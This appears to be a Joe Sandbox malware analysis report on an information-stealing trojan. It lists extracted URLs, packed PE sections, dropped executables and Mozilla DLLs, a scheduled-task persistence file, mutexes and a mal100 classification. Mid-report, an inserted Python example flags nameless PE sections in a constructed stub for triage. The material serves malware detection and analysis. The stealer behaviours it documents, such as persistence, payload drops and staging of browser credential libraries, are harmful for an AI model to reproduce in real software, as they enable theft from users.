Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Rnteb46TuM.exe, random[1].exe.10.dr, 6e6e496542.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Rnteb46TuM.exe, random[1].exe.10.dr, 6e6e496542.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: Rnteb46TuM.exe, random[1].exe.10.dr, 6e6e496542.exe.10.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330958093.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: JKKEHJDH.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: JKKEHJDH.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, JKKEHJDH.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, JKKEHJDH.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: JKKEHJDH.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JKKEHJDH.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JKKEHJDH.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://support.mozilla.org
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, JKKEHJDH.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: JKKEHJDH.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org#
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/ECAAECGD
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxl
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary

Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: .idata
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
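The section-name findings above (empty names on AFBFHDBKJE.exe, amadka[1].exe, explorti.exe, Rnteb46TuM.exe and the two Stealc payloads) are cheap to reproduce outside the sandbox. The following is an added example, not code from the report, from Joe Sandbox or from the sample: it walks the PE section table by hand (no pefile dependency), returns each section's raw 8-byte Name field, and flags empty names and names containing bytes outside the letters/digits/./_/$ set. That allowed set is this example's heuristic, not the sandbox's rule (it does not flag `.idata`, which the report lists alongside the nameless sections). The PE image it parses is a constructed header-only stub whose section list mirrors the AFBFHDBKJE.exe entries plus one made-up special-character name.

```python
"""Flag nameless and odd-named sections in a PE file by parsing the section table.

Added example (not from the report or the sample). Works on raw bytes so it can
be pointed at dropped files; build_test_pe() fabricates a header-only image
for the usage below.
"""
import string
import struct

PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_FMT = "<HHIIIHH"                          # IMAGE_FILE_HEADER
COFF_HEADER_SIZE = struct.calcsize(COFF_HEADER_FMT)   # 20 bytes
SECTION_HEADER_SIZE = 40                              # IMAGE_SECTION_HEADER
# Bytes normally seen in linker-produced names (.text, .rdata, .debug$S, INIT).
# Heuristic chosen for this example, not the sandbox's definition.
NORMAL_NAME_BYTES = set((string.ascii_letters + string.digits + "._$").encode())


def section_names(pe: bytes) -> list:
    """Return the raw 8-byte Name field of every IMAGE_SECTION_HEADER."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (_machine, num_sections, _stamp, _symtab, _nsyms,
     opt_header_size, _flags) = struct.unpack_from(COFF_HEADER_FMT, pe, coff)
    table = coff + COFF_HEADER_SIZE + opt_header_size
    end = table + num_sections * SECTION_HEADER_SIZE
    if end > len(pe):
        raise ValueError("section table runs past end of file")
    return [pe[off:off + 8] for off in range(table, end, SECTION_HEADER_SIZE)]


def section_name_findings(pe: bytes) -> list:
    """(name, reason) for each section a triage analyst would flag."""
    findings = []
    for raw in section_names(pe):
        name = raw.rstrip(b"\0")
        if not name:
            findings.append((name, "nameless section"))
        elif any(b not in NORMAL_NAME_BYTES for b in name):
            findings.append((name, "special characters in section name"))
    return findings


def build_test_pe(names: list) -> bytes:
    """Constructed minimal PE32 image carrying the given section names.

    Headers only: enough for section-table parsing, not a loadable file.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))          # e_lfanew -> 0x40
    opt = b"\x0b\x01" + bytes(0xE0 - 2)                  # Magic 0x10B, rest zero
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, len(names), 0, 0, 0, len(opt), 0x0102)
    sections = b"".join(n.ljust(8, b"\0")[:8] + bytes(SECTION_HEADER_SIZE - 8)
                        for n in names)
    return bytes(dos) + PE_SIGNATURE + coff + opt + sections


# Constructed: two nameless sections and .idata as on AFBFHDBKJE.exe above,
# plus one invented name with non-printable bytes.
SUSPICIOUS_PE = build_test_pe([b".text", b"", b".idata", b"", b"\x9c@\x01x"])
CLEAN_PE = build_test_pe([b".text", b".rdata", b".data", b".rsrc", b".reloc"])

if __name__ == "__main__":
    for raw_name, reason in section_name_findings(SUSPICIOUS_PE):
        print(f"{raw_name!r:14} {reason}")
```

Because the check only reads the COFF header and section table, it works on packed or truncated droppers as long as the headers are intact, which is exactly where nameless sections tend to appear. On real files, pair it with the section characteristics (a writable and executable section alongside an empty name is the combination the "changes PE section rights" signature in this report is hinting at).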
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C7FB700
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C7FB8C0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C7FB910
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C79F280
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_0077F944 0_2_0077F944
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7935A0 0_2_6C7935A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A5440 0_2_6C7A5440
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D5C10 0_2_6C7D5C10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E2C10 0_2_6C7E2C10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80AC00 0_2_6C80AC00
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D6CF0 0_2_6C7D6CF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79D4E0 0_2_6C79D4E0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BD4D0 0_2_6C7BD4D0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80542B 0_2_6C80542B
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A64C0 0_2_6C7A64C0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80545C 0_2_6C80545C
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F34A0 0_2_6C7F34A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FC4A0 0_2_6C7FC4A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A6C80 0_2_6C7A6C80
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BED10 0_2_6C7BED10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C0512 0_2_6C7C0512
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AFD00 0_2_6C7AFD00
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F85F0 0_2_6C7F85F0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D0DD0 0_2_6C7D0DD0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79C670 0_2_6C79C670
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B9E50 0_2_6C7B9E50
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D3E50 0_2_6C7D3E50
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E2E4E 0_2_6C7E2E4E
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B4640 0_2_6C7B4640
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F9E30 0_2_6C7F9E30
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C8076E3 0_2_6C8076E3
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D7E10 0_2_6C7D7E10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E5600 0_2_6C7E5600
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79BEF0 0_2_6C79BEF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AFEF0 0_2_6C7AFEF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F4EA0 0_2_6C7F4EA0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C806E63 0_2_6C806E63
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B5E90 0_2_6C7B5E90
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FE680 0_2_6C7FE680
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D7710 0_2_6C7D7710
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A9F00 0_2_6C7A9F00
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C6FF0 0_2_6C7C6FF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79DFE0 0_2_6C79DFE0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E77A0 0_2_6C7E77A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DF070 0_2_6C7DF070
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B8850 0_2_6C7B8850
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BD850 0_2_6C7BD850
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C8050C7 0_2_6C8050C7
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DB820 0_2_6C7DB820
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E4820 0_2_6C7E4820
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A7810 0_2_6C7A7810
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BC0E0 0_2_6C7BC0E0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D58E0 0_2_6C7D58E0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C60A0 0_2_6C7C60A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7EB970 0_2_6C7EB970
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AD960 0_2_6C7AD960
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BA940 0_2_6C7BA940
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CD9B0 0_2_6C7CD9B0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79C9A0 0_2_6C79C9A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D5190 0_2_6C7D5190
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F2990 0_2_6C7F2990
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80B170 0_2_6C80B170
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80BA90 0_2_6C80BA90
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D9A60 0_2_6C7D9A60
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C802AB0 0_2_6C802AB0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B1AF0 0_2_6C7B1AF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DE2F0 0_2_6C7DE2F0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D8AC0 0_2_6C7D8AC0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7ACAB0 0_2_6C7ACAB0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7922A0 0_2_6C7922A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C4AA0 0_2_6C7C4AA0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AC370 0_2_6C7AC370
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C795340 0_2_6C795340
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C8053C8 0_2_6C8053C8
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DD320 0_2_6C7DD320
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79F380 0_2_6C79F380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F1E410 10_2_00F1E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F14CD0 10_2_00F14CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F53048 10_2_00F53048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F47D63 10_2_00F47D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F56EE9 10_2_00F56EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F14AD0 10_2_00F14AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F5763B 10_2_00F5763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F52BB0 10_2_00F52BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F5775B 10_2_00F5775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F58700 10_2_00F58700
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0C3C 12_2_7F7A0C3C
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0000 12_2_7F7A0000
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: String function: 6C7D94D0 appears 90 times
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: String function: 6C7CCBE8 appears 134 times
Source: Rnteb46TuM.exe, 00000000.00000002.2331631871.000000006CA15000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Rnteb46TuM.exe
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUI vs Rnteb46TuM.exe
Source: Rnteb46TuM.exe, 00000000.00000002.2331203873.000000006C822000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Rnteb46TuM.exe
Source: Rnteb46TuM.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Rnteb46TuM.exe Static PE information: Section: ZLIB complexity 0.9994759908536586
Source: Rnteb46TuM.exe Static PE information: Section: ZLIB complexity 0.9935302734375
Source: Rnteb46TuM.exe Static PE information: Section: ZLIB complexity 0.9891357421875
Source: AFBFHDBKJE.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: AFBFHDBKJE.exe.0.dr Static PE information: Section: wcjrprme ZLIB complexity 0.9942531117384056
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: amadka[1].exe.0.dr Static PE information: Section: wcjrprme ZLIB complexity 0.9942531117384056
Source: explorti.exe.8.dr Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: explorti.exe.8.dr Static PE information: Section: wcjrprme ZLIB complexity 0.9942531117384056
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.99359130859375
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9901123046875
Source: 6e6e496542.exe.10.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: 6e6e496542.exe.10.dr Static PE information: Section: ZLIB complexity 0.99359130859375
Source: 6e6e496542.exe.10.dr Static PE information: Section: ZLIB complexity 0.9901123046875
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@0/3
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C7F7030
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
